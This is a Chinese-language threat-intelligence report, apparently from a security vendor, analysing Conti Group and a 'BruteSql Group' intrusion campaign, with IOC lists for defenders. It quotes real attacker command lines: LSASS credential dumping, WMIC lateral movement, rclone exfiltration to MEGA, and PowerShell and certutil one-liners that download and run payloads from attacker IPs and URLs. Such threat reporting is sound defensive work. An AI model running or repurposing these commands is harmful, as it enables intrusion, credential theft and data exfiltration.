Operation(верность) mercenary:陷陣於東歐平原的鋼鐵洪流

科技紅雨滴團隊

概述

奇安信威脅情報中心一直在對俄語威脅者以及活躍的地下論壇保持高強度的跟蹤,最近我們觀察到聞名全球的Conti Group在這半年內使用Exchange漏洞對風險投資公司、奢侈品企業、晶片製造業、外企合資製造業發起定向性攻擊活動,這些被攻擊的企業都有一個共同的特點:「富有」。

Conti Group是現階段最活躍的勒索團伙之一,根據境外友商cyberint去年的發佈的報告[1],Conti Group在2021年成功開展了600次攻擊活動,共盈利27億美元。由於在2022年2月份Conti Group的高管宣稱在俄烏戰爭中站隊俄羅斯一側,導致其內部資料被人在Twitter上公開。

cyberint對洩露的資訊進行分析後發現,Conti Group內部人員高達400餘人,分工之細堪比一家小型科技公司。

美國連線雜誌稱

美國《連線》雜誌稱[2]洩露的聊天記錄表明Conti Group與APT29存在臨時性的合作。

除了Conti Group,我們也觀察到其他俄語威脅者通過爆破主流資料庫或者利用Nday漏洞的形式植入CobatStrike或者anydesk遠端控制軟體,等到時機成熟後下發GlobeImposter或者Leakthemall勒索軟體,我們將其命名為BruteSql Group。我們在上半年曾經發表過《死灰復燃!新型REvil勒索軟體在野攻擊活動分析》[3]介紹了REvil勒索軟體最新的攻擊活動,但是在之後的數月裡並沒有看到類似的攻擊活動,暗網頁面也沒有更新,攻擊團伙轉入了不活躍的狀態。

與之前的文章類似,本文內容也僅僅是對Conti Group在過去半年時間內攻擊手法做一個分享。文末會分享該團伙歷史使用的IOC,供友商追蹤溯源。

Conti Group

Conti Group通過Exchange漏洞與目標機器建立隧道連接,之後向\windows\system32目錄下投遞名為lsass.dll的密碼竊取後門。執行的命令列如下:

命令列

cmd.exe /c !uplaod D:\Uchebka\work\SOFT\LSASS\lsass.dll -dest C:\Windows\system32\lsass.dll

reg.exe add “HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider” /v “ProviderPath” /t “REG_EXPAND_SZ” /d “C:\Windows\system32\lsass.dll”

cmd.exe /c dir c:\windows\temp\tmpQWER.tmp

rundll32 C:\Windows\Sysnative\comsvcs.dll, MiniDump 668 c:\windows\temp\tmpQWER.dmp full

從命令列中可以看到Conti Group攻擊者的工作路徑,Uchebka經過查詢是東歐地區人的姓氏。

Md5

檔案名

0838b1a1618c5ea3137ece85f83686c0

lsass.dll

樣本主要功能將系統憑證儲存到c:\windows\temp\tmpQWER.tmp檔案中。

攻擊者成功抓取域管的賬號密碼後在C:\ProgramData下釋放Psexec.exe,並執行了兩個BAT腳本。

輸出後的檔案如下:

輸出後的檔案如下

另一個BAT腳本則是查看內網C段中所有機器的Program Files目錄

攻擊者在內網漫遊過程中還會使用wmic和winrs等系統命令進行橫向移動,投遞Anydesk遠端控制程序。

命令列

cmd.exe /c winrs -rlocalhost -u:XXXXX -p:XXXXX cmd.exe /c ver

cmd.exe /c WMIC /node:”XXXX” /user:”XXXXXX” /password:”XXXXXX” process call create “c:\programdata\AnyDesk.exe –get-id”

除了Anydesk,攻擊者還會植入木馬後門,這些樣本在程式碼邏輯層面沒有任何同源性,其功能只是記憶體解密CS載荷並載入。

Md5

檔案名

c914661e98b35630a9abc356f4b24c58

rew.dll

dbb8f2e4225ed6fb09e78493052d50a8

Sys.dll

02953d5f6363896427d09fa112f5da16

Wud.dll

大部分的木馬都是無檔案,例如我們在一臺LDAP伺服器上發現了五個注入到系統進程中的CS載荷。

當Conti在內網中找到高價值的伺服器後會下發rclone工具複製敏感資料。

命令列

rclone copy –max-age 3y “\\XXXXXXX\D$” remote:”XXXXXX\files\D” –exclude “*.{iso,pptx,msi,vmdk,pptx.MP4,psd,7z,rar,zip,MOV,FIT,FIL,mp4,mov,mdb,iso,exe,dll,mkv,ova,one}” -q –ignore-existing –auto-confirm –multi-thread-streams 30 –transfers 30 –bwlimit 5M -P

檔案目錄如下:

Rclone配置檔案如下:

攻擊者使用匿名郵箱othdripinid1979@protonmail.com註冊了MEGA網盤並花了19.99歐元通過比特幣支付的方式購買了會員服務。

根據歷史登入資訊我們發現攻擊者在2022年2月25日時使用波蘭的IP(37.252.11.18)通過firefox瀏覽器登入mega網頁端,兩分鐘後購買了會員服務。

在其他的攻擊活動中Conti Group通過Exchange漏洞啟動powershell直接下載CobaltStrike並執行。

命令列

powershell /c powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat -outfile 7.bat

powershell /c powershell.exe Invoke-WebRequest -URI https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat -outfile 8.bat

下載的BAT內容如下,執行CS後門。

命令列

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://91.213.50.102:80/avadacedavra’))”

接著安裝screenconnect服務,實現遠端控制。

ITW

https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi

以上操作均被天擎攔截,幾天後不甘心的攻擊者通過certutil.exe的方式投遞payload。

命令列

Cmd /c certutil.exe –urlcache –split –f http://80.209.241.3:8888/1.msi

遺憾的是該命令也被天擎攔截,msi檔案會在programdata目錄下釋放anydesk實現遠端控制。

由於我們及時對相關IOC進行封堵並提前告知客戶,所以在我們的視野中沒有看到勒索軟體的下發。我們掌握的IOC與美國CISA發佈的報告[4]存在一定程度的重合,另外根據境外友商在過去兩年中發佈的Conti相關報告中的TTP進行對比我們綜合判斷以上攻擊事件均隸屬於Conti Group。

基於CobaltStrike的C2,我們注意到Google TAG團隊在2022年5月19日曾發佈過一篇名為《Bumblebee Malware from TransferXL URLs》的報告中[5]提到Bumblebee的https流量會先訪問amazonAWS伺服器接著訪問CobaltStrike的域名xenilik.com。

該域名與我們在LDAP伺服器上發現的無檔案的CS回連的C2一致,我們看到的時間為2022年5月16日。所以我們認為Bumblebee Malware的活動也歸屬於Conti Group。

BruteSql Group

我們在日常威脅狩獵過程中發現了另一夥俄語威脅者通過對sql server爆破和Nday漏洞的方式執行cmd命令載入CobaltStrike後門,成功植入木馬後釋放anydesk實現遠端控制,命令列如下:

命令列

cmd /c powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(“””http://92.255.85.138:80/a”””))”

cmd.exe /c “echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile(“http://144.48.240.69/dar.exe”,”%TEMP%\UN8NWHI0.exe”) >> %TEMP%\test.ps1 & powershell -ExecutionPolicy Bypass %temp%\test.ps1 & WMIC process call create “%TEMP%\UN8NWHI0.exe””

木馬資訊如下。

Md5

檔案名

72c84779b5862c1462ca0c3da30bde39

un8nwhi0.exe

7d74663288cd910c7dfd00e4e3136a23

fkgwcwg.exe

木馬執行過程中會將CobaltStrike注入到系統進程regasm.exe中。C2: 92.255.85.138: 8991。攻擊者會通過regasm.exe下發anydesk遠端控制,接著會下發一些工具,竊取相關軟體的密碼。

Md5

檔案名

09078828931a04c2a3f95db7641ce805

webbrowserpassview.exe

264f7b719ce8bc281377582a24eaac69

wirelesskeyview64.exe

28dc8674d8d692ed156998520a5e6303

mimikatz.exe

35861f4ea9a8ecb6c357bdb91b7df804

pspv.exe

36e91497fee355a45a5cb23a5ea91139

chromepass.exe

44bd492dfb54107ebfe063fcbfbddff5

rdpv.exe

4b27c3d57fe01a2a5b2001854507e0e2

iepv.exe

6121393a37c3178e7c82d1906ea16fd4

pstpassword.exe

76b916f3eeb80d44915d8c01200d0a94

routerpassview.exe

782dd6152ab52361eba2bafd67771fa0

mailpv.exe

7f31636f9b74ab93a268f5a473066053

bulletspassview64.exe

d28f0cfae377553fcb85918c29f4889b

vncpassview.exe

我們觀察到該團伙在2021年主要投遞的是global imposter勒索軟體,但是到了2022年該團伙開始投遞Leakthemall勒索軟體。

Md5

檔案名

480d33334909d49d61cb75c536aef1f7

360.exe

Fee16109b05f88040bc7f41e71dd50b5

360.exe

在七月份時我們觀察到該團伙開始投遞基於Conti原始碼修改而來的Bluesky勒索軟體[6],境外友商將其與Conti Group相關聯,由於我們沒有獲取到更多資訊,故暫不做任何結論性的推測。

命令列

iex ((New-Object System.Net.WebClient).DownloadString(“https://kmsauto.us/someone/start.ps1”))

總結

目前,基於奇安信威脅情報中心的威脅情報資料的全線產品,包括奇安信威脅情報平臺(TIP)、天擎、天眼高級威脅檢測系統、奇安信NGSOC、奇安信態勢感知等,都已經支持對此類攻擊的精確檢測。

IOC

IOC

Conti Group

MD5:

0838b1a1618c5ea3137ece85f83686c0

c914661e98b35630a9abc356f4b24c58

dbb8f2e4225ed6fb09e78493052d50a8

02953d5f6363896427d09fa112f5da16

C2:

rewujisaf.com

fuvataren.com

xenilik.com

kusayeyixa.com

wudimomo.com

URL:

https://cdn.discordapp.com/attachments/943969145555398739/951446861363961866/7.bat

https://cdn.discordapp.com/attachments/952197064920555553/952197359423606865/New_Text_Document.bat

http://91.213.50.102:80/avadacedavra

http://80.209.241.3:8888/1.msi

https://cdn-101.anonfiles.com/xd65J5gdya/088d20aa-1652635603/2.msi

BruteSql Group

MD5:

72c84779b5862c1462ca0c3da30bde39

7d74663288cd910c7dfd00e4e3136a23

09078828931a04c2a3f95db7641ce805

264f7b719ce8bc281377582a24eaac69

28dc8674d8d692ed156998520a5e6303

35861f4ea9a8ecb6c357bdb91b7df804

36e91497fee355a45a5cb23a5ea91139

44bd492dfb54107ebfe063fcbfbddff5

4b27c3d57fe01a2a5b2001854507e0e2

6121393a37c3178e7c82d1906ea16fd4

76b916f3eeb80d44915d8c01200d0a94

782dd6152ab52361eba2bafd67771fa0

7f31636f9b74ab93a268f5a473066053

d28f0cfae377553fcb85918c29f4889b

480d33334909d49d61cb75c536aef1f7

Fee16109b05f88040bc7f41e71dd50b5

C2:

92.255.85.138: 8991

URL:

http://144.48.240.69/dar.exe

http://92.255.85.138:80/a

https://kmsauto.us/someone/start.ps1

參考連結

[1] https://cyberint.com/blog/research/contileaks/

[2] https://www.wired.com/story/conti-ransomware-russia/

[3] https://mp.weixin.qq.com/s/A9c4Le-DL8fBEw8hfe1EcQ

[4] https://www.cisa.gov/uscert/ncas/alerts/aa21-265a

[5] https://isc.sans.edu/diary/rss/28664

[6] https://cloudsek.com/threatintelligence/tracking-the-operators-of-the-newly-emerged-bluesky-ransomware/

點選閱讀原文至

點選閱讀原文至ALPHA 5.0

即刻助力威脅研判

相關文章